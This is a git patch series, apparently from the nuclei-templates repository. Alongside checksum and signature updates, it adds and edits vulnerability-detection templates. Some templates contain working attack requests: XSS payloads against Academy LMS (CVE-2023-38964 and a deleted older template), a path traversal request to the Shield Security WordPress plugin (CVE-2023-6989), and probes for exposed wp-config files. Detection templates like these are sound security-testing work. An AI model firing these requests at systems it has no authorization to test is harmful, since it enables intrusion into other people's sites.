workflows/solr-workflow.yaml:0bbd2e046f3c7c2c37ed9dcce620d0ca2bf7490a workflows/sonarqube-workflow.yaml:526032eea636a226a0906c69651f74cdeac5b504 workflows/sourcebans-workflow.yaml:d20623d3701dc0cd7a563e26e5578e5f7d7abd17 -workflows/splunk-workflow.yaml:b1a747036b9b4cb038608661da200289734bedad +workflows/splunk-workflow.yaml:1a1573714878d4c5d76a44b346850e824d17edc3 workflows/springboot-workflow.yaml:863cfba2a94d735ab287e7d73f1c46ebaec87cfd workflows/squirrelmail-workflow.yaml:00c1a831d1483d8c7fb83402cbebfffe7c18feb8 workflows/subrion-workflow.yaml:185f05da51ddb75f1d142c6f02aaa9b6f0aa73ba From 65eb34943a34f3e8851bb18ef66f409077c08e28 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 30 Apr 2024 06:18:03 +0000 Subject: [PATCH 0450/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 31fd4e2b94..d0c6854508 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -26,7 +26,7 @@ on: - 'http/exposed-panels/tixeo-panel.yaml' - 'http/misconfiguration/installer/sabnzbd-installer.yaml' - 'http/misconfiguration/titannit-web-exposure.yaml' - - 'http/vulnerabilities/titan/titannit-web-ssrf.yaml' + - 'http/vulnerabilities/titan/titannit-web-rce.yaml' - 'network/detection/aix-websm-detect.yaml' - 'network/detection/bluecoat-telnet-proxy-detect.yaml' workflow_dispatch: From ed86b03d052102d71cbc2c3eeeac68172697b496 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 30 Apr 2024 06:19:17 +0000 Subject: [PATCH 0451/1768] Auto Generated New Template Addition List [Tue Apr 30 06:19:17 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a5ac273ac9..0b4e3fbeff 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2023/CVE-2023-2227.yaml http/cves/2023/CVE-2023-2948.yaml http/cves/2023/CVE-2023-2949.yaml http/cves/2023/CVE-2023-31446.yaml +http/cves/2023/CVE-2023-32077.yaml http/cves/2023/CVE-2023-4973.yaml http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-1183.yaml From 01610168d366092ff9d004eec320aa8b9a2f9a63 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 30 Apr 2024 06:19:24 +0000 Subject: [PATCH 0452/1768] Auto Generated Templates Checksum [Tue Apr 30 06:19:24 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 625fe9e29e..7859460501 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3026,6 +3026,7 @@ http/cves/2023/CVE-2023-31059.yaml:2f55ef6a46f15bb784839290fdc7a1a536472c36 http/cves/2023/CVE-2023-31446.yaml:0ba3222752c4cc2de6941cdce24a66042f78e1c3 http/cves/2023/CVE-2023-31465.yaml:6bd33dcdf6008201a427dc26394290cd8a743bee http/cves/2023/CVE-2023-31548.yaml:2c5cbc65c0eccc342f8a64e1446f235eb72859a9 +http/cves/2023/CVE-2023-32077.yaml:b811501cd57dff26f3b0dc7d2b28c14e7fa693c9 http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b http/cves/2023/CVE-2023-3219.yaml:30c6a139afeb951daf2ed2734dcae25ef3db05ca http/cves/2023/CVE-2023-32235.yaml:97088e4dd3fc67bdf37659084e1c32fdb2670818 @@ -4030,7 +4031,7 @@ http/exposed-panels/movable-type-login.yaml:508709af62f02d5ef93ae76aec1011e33ed9 http/exposed-panels/mpftvc-admin-panel.yaml:27d2315c408e5c841b919dd79179b3f258fff0ed http/exposed-panels/mpsec-isg1000-panel.yaml:502b156e58d8ec3d292c50a100686eca248af616 http/exposed-panels/ms-adcs-detect.yaml:1ab74132704c2624f19daf5aa4e91de02d43b631 -http/exposed-panels/ms-exchange-web-service.yaml:255c6cd08b7e42ddc3f05860351b8917ba3c08ba +http/exposed-panels/ms-exchange-web-service.yaml:e667bac7898fb9a4ea916c37fa9c78a074e7597f http/exposed-panels/mspcontrol-login.yaml:d381675b12cdce4fe5f104c4e3b114387242a74c http/exposed-panels/mybb/mybb-forum-install.yaml:764347d8fe87bdd580b7f5fec9dcc60b90c0aa25 http/exposed-panels/mybb-forum-detect.yaml:4952dbcff061cad8b74587f35167a1f4f1229031 @@ -8457,7 +8458,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c02da6eec0dfb882033c3cdfb3c20de17abcc64a +templates-checksum.txt:3fcbf6db068218d58d2ace2d039723565ae5db6e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7cc0919516e87d38fe36c6505b923aa6fac36112 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 30 Apr 2024 06:19:56 +0000 Subject: [PATCH 0454/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d0c6854508..e4b23a3e7e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/cves/2023/CVE-2023-2948.yaml' - 'http/cves/2023/CVE-2023-2949.yaml' - 'http/cves/2023/CVE-2023-31446.yaml' + - 'http/cves/2023/CVE-2023-32077.yaml' - 'http/cves/2023/CVE-2023-4973.yaml' - 'http/cves/2024/CVE-2024-0235.yaml' - 'http/cves/2024/CVE-2024-1183.yaml' From e03b38d159000e3af121e0a336bce002d7133aa9 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 30 Apr 2024 06:21:06 +0000 Subject: [PATCH 0455/1768] Auto Template Signing [Tue Apr 30 06:21:06 UTC 2024] :robot: --- http/cves/2023/CVE-2023-32077.yaml | 1 + http/exposed-panels/ms-exchange-web-service.yaml | 2 +- http/vulnerabilities/titan/titannit-web-rce.yaml | 2 +- 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-32077.yaml b/http/cves/2023/CVE-2023-32077.yaml index 779bf77a5c..5bddf6b981 100644 --- a/http/cves/2023/CVE-2023-32077.yaml +++ b/http/cves/2023/CVE-2023-32077.yaml @@ -37,3 +37,4 @@ http: - 'contains(header, "application/json")' - 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")' condition: and +# digest: 490a00463044022044db0025b30ee01f7b653b83140795eaf85cb6c5037c5f592c309666b0191a660220208862f3f2eb0ddb3dcc357a3c4811cc439136e6f123760564c5c0cf2f9274ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ms-exchange-web-service.yaml b/http/exposed-panels/ms-exchange-web-service.yaml index a0fa3590f3..2b10435e59 100644 --- a/http/exposed-panels/ms-exchange-web-service.yaml +++ b/http/exposed-panels/ms-exchange-web-service.yaml @@ -42,4 +42,4 @@ http: - type: kval kval: - x_owa_version -# digest: 490a0046304402206f5d9c0e0b23e4a8ae9d2f4b99f3688c2daef6cb59037899bfea6455bbcf654f0220058960e38002865396412449c4bd3a73c107d3ffbb32c56088b70801e6cbef79:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fb3512635763556b898da7ebbc54996873117953a7ba2fbc3b876c9a8a133c94022100e38b042a828cb26dcee5a24ebc661d61e01dba07dc2265fe1e5315b99ef39ecb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/titan/titannit-web-rce.yaml b/http/vulnerabilities/titan/titannit-web-rce.yaml index ad5f64e6b1..5df0fa8c96 100644 --- a/http/vulnerabilities/titan/titannit-web-rce.yaml +++ b/http/vulnerabilities/titan/titannit-web-rce.yaml @@ -34,4 +34,4 @@ http: part: body words: - "titan.css" -# digest: 4b0a00483046022100879d069429630f609a358e6d75ca42bc2a252e693eacd5871e1fd985f8c45a9d022100a9e019ea6c7dbc14a86cca85d5e089e3a2ef69454aedbbd719d6e15f9a5321dc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204924c878a5a761c1445ca81b66143ef9dc59bee364ee1c721712f16e3c4fc6d80221008fa2593dc7557f42af384a29e3b87cab735bd2cb14cc635787fe6809aef33640:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 590cb2666f2edb03b6318dd49cd6e06424e641e3 Mon Sep 17 00:00:00 2001 From: idealphase <mynameisphase@gmail.com> Date: Tue, 30 Apr 2024 13:36:55 +0700 Subject: [PATCH 0456/1768] Update https-to-http-redirect.yaml Added using meta refresh to create an instant client-side redirect --- http/misconfiguration/https-to-http-redirect.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/https-to-http-redirect.yaml b/http/misconfiguration/https-to-http-redirect.yaml index 6e77295ca0..38b23aae40 100644 --- a/http/misconfiguration/https-to-http-redirect.yaml +++ b/http/misconfiguration/https-to-http-redirect.yaml @@ -16,6 +16,7 @@ http: path: - "{{BaseURL}}" + matchers-condition: or matchers: - type: dsl dsl: @@ -23,4 +24,11 @@ http: - 'startswith(tostring(BaseURL), "https://")' - '(status_code == 300 || status_code == 301 || status_code == 302 || status_code == 303 || status_code == 307 || status_code == 308)' condition: and -# digest: 4a0a00473045022100b9fde0b93319dcf6c7deda7cbca2fc520ef1dfb694e8756f6f04cdfb585c070e02205737762ea399cbcdaf947d7a6e394df2676b64d3e867497034ce78ba661eb683:32bd8904a85baa2268cd2e24368f3b1a + + - type: dsl + dsl: + - 'startswith(tostring(BaseURL), "https://")' + - 'status_code == 200' + - 'contains(tolower(body), "<meta http-equiv=\"refresh\" content=\"0; url=http://")' + condition: and +# digest: 4b0a0048304602210095c09fe6d8f15bcb97731bcc870184de2350c35ab0db26b19fc3bbced9862e7b022100fbe5cddc9cf4e2d70fc2e700dbe0c90a05e20536b932ac17e44bb0b83d7edf8c:32bd8904a85baa2268cd2e24368f3b1a From f3a572971b3c9aca091a155b3712aab926d2de07 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Apr 2024 13:05:16 +0530 Subject: [PATCH 0457/1768] Delete http/vulnerabilities/other/academy-lms-xss.yaml --- .../other/academy-lms-xss.yaml | 45 ------------------- 1 file changed, 45 deletions(-) delete mode 100644 http/vulnerabilities/other/academy-lms-xss.yaml diff --git a/http/vulnerabilities/other/academy-lms-xss.yaml b/http/vulnerabilities/other/academy-lms-xss.yaml deleted file mode 100644 index b5957c9b65..0000000000 --- a/http/vulnerabilities/other/academy-lms-xss.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: academy-lms-xss - -info: - name: Academy Learning Management System 5.11 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - Academy Learning Management System 5.11 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - reference: - - https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html - - https://vulners.com/packetstorm/PACKETSTORM:170514 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cwe-id: CWE-80 - metadata: - verified: true - max-request: 1 - shodan-query: http.html:"Academy LMS" - tags: packetstorm,lms,academy,xss - -http: - - method: GET - path: - - "{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<script>alert(document.domain)</script>' - - 'Academy LMS' - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# digest: 4b0a004830460221009e530a17ae78eac3aa6f5f7068e7bf08f565124913897a0d1dd64d31f40788d2022100b28dd0a800a903ce5787b586745bf33830e97dec0adc8a91858774a5ba5218c9:922c64590222798bb761d5b6d8e72950 From 49b9a833e4716d49e6c1a8d9958e46bf4bb94ed2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 30 Apr 2024 08:52:27 +0000 Subject: [PATCH 0459/1768] Auto Generated Templates Checksum [Tue Apr 30 08:52:27 UTC 2024] :robot: --- templates-checksum.txt | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7859460501..aa19fe4291 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3026,7 +3026,7 @@ http/cves/2023/CVE-2023-31059.yaml:2f55ef6a46f15bb784839290fdc7a1a536472c36 http/cves/2023/CVE-2023-31446.yaml:0ba3222752c4cc2de6941cdce24a66042f78e1c3 http/cves/2023/CVE-2023-31465.yaml:6bd33dcdf6008201a427dc26394290cd8a743bee http/cves/2023/CVE-2023-31548.yaml:2c5cbc65c0eccc342f8a64e1446f235eb72859a9 -http/cves/2023/CVE-2023-32077.yaml:b811501cd57dff26f3b0dc7d2b28c14e7fa693c9 +http/cves/2023/CVE-2023-32077.yaml:209f5ecaac978f98f6002f5813e39d9f49226d5c http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b http/cves/2023/CVE-2023-3219.yaml:30c6a139afeb951daf2ed2734dcae25ef3db05ca http/cves/2023/CVE-2023-32235.yaml:97088e4dd3fc67bdf37659084e1c32fdb2670818 @@ -4031,7 +4031,7 @@ http/exposed-panels/movable-type-login.yaml:508709af62f02d5ef93ae76aec1011e33ed9 http/exposed-panels/mpftvc-admin-panel.yaml:27d2315c408e5c841b919dd79179b3f258fff0ed http/exposed-panels/mpsec-isg1000-panel.yaml:502b156e58d8ec3d292c50a100686eca248af616 http/exposed-panels/ms-adcs-detect.yaml:1ab74132704c2624f19daf5aa4e91de02d43b631 -http/exposed-panels/ms-exchange-web-service.yaml:e667bac7898fb9a4ea916c37fa9c78a074e7597f +http/exposed-panels/ms-exchange-web-service.yaml:63763b42dba4a1a1a733772a1432013fc9364438 http/exposed-panels/mspcontrol-login.yaml:d381675b12cdce4fe5f104c4e3b114387242a74c http/exposed-panels/mybb/mybb-forum-install.yaml:764347d8fe87bdd580b7f5fec9dcc60b90c0aa25 http/exposed-panels/mybb-forum-detect.yaml:4952dbcff061cad8b74587f35167a1f4f1229031 @@ -7552,7 +7552,6 @@ http/vulnerabilities/oscommerce/oscommerce-rce.yaml:d399ad2fe4a2578818466b237382 http/vulnerabilities/other/3cx-management-console.yaml:c5ac1f1f2c02e040cb6b80a626c62d1d986e0191 http/vulnerabilities/other/74cms-sqli.yaml:5d44180874e39c81ee0cfccd7fb8c273dbbf48d1 http/vulnerabilities/other/WSO2-2019-0598.yaml:241773db7836f950b4f63d9578cdcb8e7a43e632 -http/vulnerabilities/other/academy-lms-xss.yaml:ecc4c96fefc6cf5ceee4cc407bfaf30d654ec5d6 http/vulnerabilities/other/accent-microcomputers-lfi.yaml:7b86368e9c0eaabd5a03518d44928f7d54e592d9 http/vulnerabilities/other/acme-xss.yaml:e621ea74a2c2237b2407a82b32cf6979899a4584 http/vulnerabilities/other/acti-video-lfi.yaml:132a0b28eb29b6078bf02e465d9caedbb8135562 @@ -7939,7 +7938,7 @@ http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml:03c2c45139f6ccce4cae1593fa60 http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml:7f769d37fd1e99b8c707f15123f774320cc68a9c http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml:293e13f7aa67bd4fab36c4174f5349acfcbc737b http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d829a9f8df913b7baf54effb4c7193d8 -http/vulnerabilities/titan/titannit-web-rce.yaml:953a07117e5186b03beaa4b0e1946575d0d99a6b +http/vulnerabilities/titan/titannit-web-rce.yaml:af49cdd36eb61fde24289ecf35ee9e54ecb5622b http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:237187847805b1973d1d857e6d6d73a392456ad7 http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc @@ -8458,7 +8457,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3fcbf6db068218d58d2ace2d039723565ae5db6e +templates-checksum.txt:c97adf8e46768c9f63f051e05dd1c8224e688923 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 @@ -8631,7 +8630,7 @@ workflows/tongda-workflow.yaml:eb464454bc68a4565f74036769ab5ecb1b5b1b38 workflows/tpshop-workflow.yaml:14fc8dbc602229190c2d67273f300d9e73d1915f workflows/traefik-workflow.yaml:87fd8abe8f383d18739dca2ad143e873483391cf workflows/umbraco-workflow.yaml:b256b361df24f4b590f76aaecd23b6f6eb0be729 -workflows/vbulletin-workflow.yaml:0753e97fa927adfb90e8deaf1530e35c284a2ce2 +workflows/vbulletin-workflow.yaml:1b365ae481fe4ce3e781fd658085068bec715655 workflows/vmware-workflow.yaml:b0438369164f8e2e741b777313d95f9039db6914 workflows/voipmonitor-workflow.yaml:0de2f5ad087b16a7bf633884b84ce73746b0ec10 workflows/weblogic-workflow.yaml:42703e119505c0196335b5c74c88ecff7eca128a From d5993c3282a95b5f7dbdb4ba203150da2d1fdca5 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Tue, 30 Apr 2024 12:03:59 +0300 Subject: [PATCH 0460/1768] add cve-2023-6989 --- http/cves/2023/CVE-2023-6989.yaml | 55 +++++++++++++++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 http/cves/2023/CVE-2023-6989.yaml diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml new file mode 100644 index 0000000000..1afc431161 --- /dev/null +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -0,0 +1,55 @@ +id: CVE-2023-6989 + +info: + name: Shield Security WP Plugin <= 18.5.9 - Unauthenticated Local File Inclusion + author: Kazgangap + severity: critical + description: | + The Shield Security Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-6989 + - https://www.cvedetails.com/cve/CVE-2023-6989/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-6989 + cwe-id: CWE-22 + epss-score: 0.00282 + epss-percentile: 0.68187 + cpe: cpe:2.3:a:getshieldsecurity:shield_security:*:*:*:*:*:wordpress:*:* + metadata: + vendor: getshieldsecurity + product: shield_security + framework: wordpress + tags: wordpress,plugin,lfi + +http: + - method: POST + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php" + + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 + Accept: "*/*" + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Connection: close + Sec-Fetch-Dest: empty + Sec-Fetch-Mode: cors + Sec-Fetch-Site: same-origin + + body: | + action=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"dashboard_shield"' + - '"shield_action"' + - '"search_shield"' \ No newline at end of file From c3afc5055199adf34c67e78ddda9c5c1d75676d1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Apr 2024 14:44:47 +0530 Subject: [PATCH 0461/1768] Create eyoucms-installer.yaml --- .../installer/eyoucms-installer.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/misconfiguration/installer/eyoucms-installer.yaml diff --git a/http/misconfiguration/installer/eyoucms-installer.yaml b/http/misconfiguration/installer/eyoucms-installer.yaml new file mode 100644 index 0000000000..10a87d98df --- /dev/null +++ b/http/misconfiguration/installer/eyoucms-installer.yaml @@ -0,0 +1,32 @@ +id: eyoucms-installer + +info: + name: EyouCMS - Installation + author: ritikchaddha + severity: high + description: EyouCMS installation is exposed. + metadata: + verified: true + max-request: 1 + fofa-query: title="eyoucms" + tags: misconfig,eyoucms,install + +http: + - method: GET + path: + - "{{BaseURL}}/install/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "EyouCms" + - "/install/index.php?step=2" + - "使用协议</p>" + condition: and + case-insensitive: true + + - type: status + status: + - 200 From ccec9fcc2ed7cb61df4912fdc20531b03e827698 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Apr 2024 14:46:55 +0530 Subject: [PATCH 0462/1768] Create CVE-2023-38964.yaml --- http/cves/2023/CVE-2023-38964.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-38964.yaml diff --git a/http/cves/2023/CVE-2023-38964.yaml b/http/cves/2023/CVE-2023-38964.yaml new file mode 100644 index 0000000000..0c46ae9543 --- /dev/null +++ b/http/cves/2023/CVE-2023-38964.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-38964 + +info: + name: Academy LMS 6.0 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability through `query` parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Apply the latest security patches provided by the vendor to mitigate the XSS vulnerability in Creative Item Academy LMS 6.0. + reference: + - https://vida03.gitbook.io/redteam/web/cve-2023-38964 + - https://nvd.nist.gov/vuln/detail/CVE-2023-38964 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-38964 + cwe-id: CWE-79 + epss-score: 0.00046 + epss-percentile: 0.15636 + cpe: cpe:2.3:a:creativeitem:academy_lms:6.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: creativeitem + product: academy_lms + fofa-query: body="Academy LMS" + tags: cve2023,cve,academylms,xss,creativeitem + +http: + - method: GET + path: + - '{{BaseURL}}/home/courses?query="><svg+onload=alert(document.domain)>' + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/html")' + - 'contains_all(body, "<svg onload=alert(document.domain)>", "All courses</span>")' + condition: and From 43982f020d42106e4eb44104a7630bbc0a0ddf95 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 30 Apr 2024 14:47:58 +0530 Subject: [PATCH 0463/1768] Update wordpress-accessible-wpconfig.yaml --- .../wordpress/wordpress-accessible-wpconfig.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index c499ec4612..830cdf6aeb 100644 --- a/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -2,8 +2,8 @@ id: wordpress-accessible-wpconfig info: name: WordPress wp-config Detection - author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n,tess,0xpugazh,mastercho - severity: medium + author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n,tess,0xpugazh,mastercho,c4sper0 + severity: high description: WordPress `wp-config` was discovered. This file is remotely accessible and its content available for reading. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N @@ -49,6 +49,8 @@ http: - "/config.php.new" - "/common/config.php.new" - "/wp-config.php.bk" + - "/home/{{DN}}WORDPRESS.txt" + - "/home/{{DN}}-WORDPRESS.txt" stop-at-first-match: true @@ -74,4 +76,4 @@ http: - "DB_USERNAME" - "DB_PASSWORD" condition: and -# digest: 4b0a00483046022100e3482e35fafed169b3577d8894756ef07374b332c632601accbb8813b1ff2766022100f03dab57c516384fc14dc867db33cdb8d637b0fe33cf505de63f01c69c67b8f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e3482e35fafed169b3577d8894756ef07374b332c632601accbb8813b1ff2766022100f03dab57c516384fc14dc867db33cdb8d637b0fe33cf505de63f01c69c67b8f0:922c64590222798bb761d5b6d8e72950 From 323bb95b6ad84a151b62eec2724c3712efde0263 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Apr 2024 14:49:18 +0530 Subject: [PATCH 0464/1768] lint fix --- http/cves/2023/CVE-2023-6989.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml index 1afc431161..f7cfc2fbcc 100644 --- a/http/cves/2023/CVE-2023-6989.yaml +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -1,7 +1,7 @@ id: CVE-2023-6989 info: - name: Shield Security WP Plugin <= 18.5.9 - Unauthenticated Local File Inclusion + name: Shield Security WP Plugin <= 18.5.9 - Local File Inclusion author: Kazgangap severity: critical description: | @@ -21,7 +21,7 @@ info: vendor: getshieldsecurity product: shield_security framework: wordpress - tags: wordpress,plugin,lfi + tags: cve,cve2023,wp,wordpress,wp-plugin,lfi http: - method: POST @@ -41,15 +41,16 @@ http: body: | action=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php - + matchers-condition: and matchers: - type: status status: - 200 - + - type: word words: - '"dashboard_shield"' - '"shield_action"' - - '"search_shield"' \ No newline at end of file + - '"search_shield"' + condition: and From cacf051d95ca443fafb7068100ea907b35bdb09a Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Tue, 30 Apr 2024 16:02:19 +0330 Subject: [PATCH 0465/1768] Add ms-exchange-local-domain exposure template --- .../configs/ms-exchange-local-domain.yaml | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/exposures/configs/ms-exchange-local-domain.yaml diff --git a/http/exposures/configs/ms-exchange-local-domain.yaml b/http/exposures/configs/ms-exchange-local-domain.yaml new file mode 100644 index 0000000000..8d1bc95f8a --- /dev/null +++ b/http/exposures/configs/ms-exchange-local-domain.yaml @@ -0,0 +1,41 @@ +id: ms-exchange-local-domain + +info: + name: Microsoft Exchange Autodiscover - Local Domain + author: userdehghani + severity: Medium + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cwe-id: CWE-200 + description: | + Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint. + reference: + - https://support.microsoft.com/en-gb/topic/autodiscover-v2-returns-internalurl-not-externalurls-in-other-site-774301e2-2d1e-d5e0-aa41-a49f6e9b06f4 + metadata: + verified: true + max-request: 1 + shodan-query: http.title:outlook exchange + tags: microsoft,ms-exchange,ad,dc + +http: + - method: GET + path: + - "{{BaseURL}}/autodiscover/autodiscover.json?Protocol=ActiveSync&Email=user@domain.tld&RedirectCount=1" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - "(?i)(X-Calculatedbetarget:)" + + - type: status + status: + - 200 + - 302 + + extractors: + - type: kval + kval: + - x_calculatedbetarget From cee9a4068caa05509cf1e1e2e18f50566d6224fd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 30 Apr 2024 18:22:48 +0530 Subject: [PATCH 0466/1768] Create CVE-2024-23917.yaml --- http/cves/2024/CVE-2024-23917.yaml | 68 ++++++++++++++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 http/cves/2024/CVE-2024-23917.yaml diff --git 